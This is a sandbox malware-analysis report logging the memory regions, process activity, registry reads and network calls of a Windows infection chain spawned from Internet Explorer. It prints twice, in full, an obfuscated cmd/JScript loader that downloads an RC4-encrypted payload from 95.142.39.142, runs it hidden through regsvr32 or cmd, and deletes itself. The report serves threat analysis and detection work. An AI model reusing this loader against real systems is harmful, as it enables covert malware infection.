pagefile_0x0000000002e10000 0x02e10000 0x03202fff Pagefile Backed Memory Readable True False False -
private_0x0000000003210000 0x03210000 0x0330ffff Private Memory Readable, Writable True False False -
index.dat 0x03310000 0x03317fff Memory Mapped File Readable, Writable True False False -
acroiehelper.dll 0x03320000 0x0332cfff Memory Mapped File Readable False False False -
ieframe.dll 0x03330000 0x03341fff Memory Mapped File Readable False False False -
private_0x0000000003350000 0x03350000 0x0338ffff Private Memory Readable, Writable True False False -
private_0x0000000003390000 0x03390000 0x03390fff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x033dffff Private Memory Readable, Writable True False False -
private_0x00000000033e0000 0x033e0000 0x033e0fff Private Memory Readable, Writable True False False -
private_0x00000000033f0000 0x033f0000 0x033f0fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003400000 0x03400000 0x03400fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003410000 0x03410000 0x0344ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003450000 0x03450000 0x03450fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000003460000 0x03460000 0x03460fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000003470000 0x03470000 0x034affff Private Memory Readable, Writable True False False -
private_0x00000000034b0000 0x034b0000 0x034b0fff Private Memory Readable, Writable True False False -
private_0x00000000034c0000 0x034c0000 0x035bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000035c0000 0x035c0000 0x035c1fff Pagefile Backed Memory Readable True False False -
private_0x00000000035d0000 0x035d0000 0x0364ffff Private Memory Readable, Writable True False False -
private_0x0000000003650000 0x03650000 0x0368ffff Private Memory Readable, Writable True False False -
mlang.dll.mui 0x03690000 0x03693fff Memory Mapped File Readable, Writable False False False -
private_0x00000000036a0000 0x036a0000 0x036dffff Private Memory Readable, Writable True False False -
private_0x00000000036e0000 0x036e0000 0x036effff Private Memory Readable, Writable True False False -
private_0x00000000036f0000 0x036f0000 0x036f1fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003700000 0x03700000 0x03700fff Pagefile Backed Memory Readable, Writable True False False -
msctf.dll.mui 0x03710000 0x03710fff Memory Mapped File Readable, Writable False False False -
private_0x0000000003720000 0x03720000 0x0372ffff Private Memory Readable, Writable True False False -
private_0x0000000003790000 0x03790000 0x037cffff Private Memory Readable, Writable True False False -
staticcache.dat 0x037d0000 0x040fffff Memory Mapped File Readable False False False -
private_0x0000000004140000 0x04140000 0x0417ffff Private Memory Readable, Writable True False False -
private_0x0000000004190000 0x04190000 0x041cffff Private Memory Readable, Writable True False False -
private_0x0000000004230000 0x04230000 0x0423ffff Private Memory Readable, Writable True False False -
private_0x0000000004240000 0x04240000 0x0424ffff Private Memory Readable, Writable True False False -
private_0x0000000004280000 0x04280000 0x0428ffff Private Memory Readable, Writable True False False -
private_0x00000000042e0000 0x042e0000 0x043dffff Private Memory Readable, Writable True False False -
private_0x0000000004450000 0x04450000 0x0448ffff Private Memory Readable, Writable, Executable True False False -
private_0x00000000044f0000 0x044f0000 0x045effff Private Memory Readable, Writable True False False -
private_0x0000000004630000 0x04630000 0x0472ffff Private Memory Readable, Writable True False False -
private_0x0000000004820000 0x04820000 0x0491ffff Private Memory Readable, Writable True False False -
private_0x0000000004a70000 0x04a70000 0x04a7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004a80000 0x04a80000 0x04dc2fff Pagefile Backed Memory Readable True False False -
private_0x0000000004eb0000 0x04eb0000 0x04faffff Private Memory Readable, Writable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
office.odf 0x71e80000 0x72299fff Memory Mapped File Readable, Writable, Executable False False False -
grooveintlresource.dll 0x722a0000 0x72b04fff Memory Mapped File Readable, Writable, Executable False False False -
grooveex.dll 0x72b10000 0x72f18fff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x73000000 0x7305efff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x73060000 0x7311efff Memory Mapped File Readable, Writable, Executable False False False -
jp2ssv.dll 0x73120000 0x7314dfff Memory Mapped File Readable, Writable, Executable False False False -
msohev.dll 0x73150000 0x73163fff Memory Mapped File Readable, Writable, Executable False False False -
urlredir.dll 0x73170000 0x73200fff Memory Mapped File Readable, Writable, Executable False False False -
ssv.dll 0x73210000 0x73283fff Memory Mapped File Readable, Writable, Executable False False False -
msftedit.dll 0x73290000 0x73323fff Memory Mapped File Readable, Writable, Executable False False False -
mshtml.dll 0x73330000 0x738e6fff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x738f0000 0x7436ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74390000 0x74413fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 221 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\system32\shell32.dll 3.77 KB MD5: ec243b881d17ce4758ad8d3c1c13ceeb
SHA1: 49d4f500d40ff2f3dcbb41c47fcaa33e971e095f
SHA256: b983b5f76555aff6543fa2af25e80d5b488c213895e8faa2ae2acca22bed60b3
False
Threads
Thread 0x950
53 6
Category Operation Information Success Count Logfile
Process Create process_name = cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", os_pid = 0xa6c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x776c0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstance, address_out = 0x77709d0b True 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 100121 True 1
Fn
System Get Time type = Ticks, time = 102711 True 3
Fn
System Get Time type = Ticks, time = 102773 True 2
Fn
System Get Time type = Ticks, time = 102789 True 2
Fn
System Get Time type = Ticks, time = 102804 True 2
Fn
System Get Time type = Ticks, time = 102882 True 2
Fn
System Get Time type = Ticks, time = 102898 True 2
Fn
System Get Time type = Ticks, time = 102960 True 3
Fn
System Get Time type = Ticks, time = 102976 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateBindCtx, address_out = 0x77706d2c True 1
Fn
Module Get Address module_name = Unknown module name, function = MkParseDisplayName, address_out = 0x776ccea9 True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = DuplicateTokenEx, address_out = 0x760eca24 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Module Get Address module_name = Unknown module name, function = BindMoniker, address_out = 0x776cc6a7 True 1
Fn
COM Get Class ID cls_id = 2087C2F4-2CEF-4953-A8AB-66779B670495, prog_id = WinHTTP.WinHTTPRequest.5.1 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoGetClassObject, address_out = 0x776f54ad True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = 95.142.39.142, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = / True 1
Fn
Inet Send HTTP Request url = http://95.142.39.142/?MzUzMTAy&ZNAVNHmAYOK&fdfsdf3gf=wn_QMvXcLxXQFYbCKuXDSKZDKU7WGUaVw4-dhMG3YprNfynz0uzURnLytASVVFmRrbMdL7dTO&rqWIetbNyd=Zmx5&t4dsdfa4=VLjiRGDegE0zY9aUFNG9v2v30aGzBXJiZaL_xCMYQxG95qdE7UL0VT8zrgdecIkzibfqWBT_A&hqNrCjJSgrWztKY=c2Vh&devbnQaWlmZ=cmVzb3J0&JVcVIIe=c2My&HheAqNwtJfbNda=c2hha2U=&YiuYJvmcJMhvOk=c3BvcnQ=&PQYFBaAantoAeLc=c3BvcnQ= True 1
Fn
Inet Receive HTTP Status status = 200 True 1
Fn
Inet Read Response size_out = 323593 True 1
Fn
Data
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Time type = Ticks, time = 107406 True 1
Fn
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = Shell.Application True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Process #3: cmd.exe
69 0
Information Value
ID #3
File Name c:\windows\syswow64\cmd.exe
Command Line cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:34, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0xa6c
Parent PID 0x938 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A70
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True False False -
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000005f0000 0x005f0000 0x006effff Private Memory Readable, Writable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x00877fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a00fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x01e0ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e10000 0x01e10000 0x02152fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a960000 0x4a9abfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75430000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
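c:\users\5p5nrg~1\appdata\local\temp\u32.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
(Note: these three digests are the standard MD5/SHA-1/SHA-256 values of zero-length input, consistent with the 0.00 KB size. This row presumably records u32.tmp as first created, before the 1141-byte write logged in the thread below. The digests match any empty file and should not be used as indicators; the 1.11 KB entry that follows is the populated file.)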
c:\users\5p5nrg~1\appdata\local\temp\u32.tmp 1.11 KB MD5: 6e9ad2e298b1801b54e706f2dede9acf
SHA1: 4f5b955bef450c8466b51d80d117cf7013d1af2a
SHA256: 7fab866ce5474e690a06ca556c76e63a3c3c184ae493fce03bb2a839ef7ef725
False
Threads
Thread 0xa70
69 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 99825 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a960000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76003b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75ffa79d True 1
Fn
Environment Get Environment String name = tmp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String name = e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E False 1
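Fn
(Note: the variable name in the failed lookup above is a fragment of the echoed script text, running from the `%` in `b%e.length` to the `:` in `//E:JScript`. It appears to come from cmd.exe treating that `%` as the start of a variable reference while parsing its own command line, not from a lookup made by the script.)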
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Create filename = u32.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 1141 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
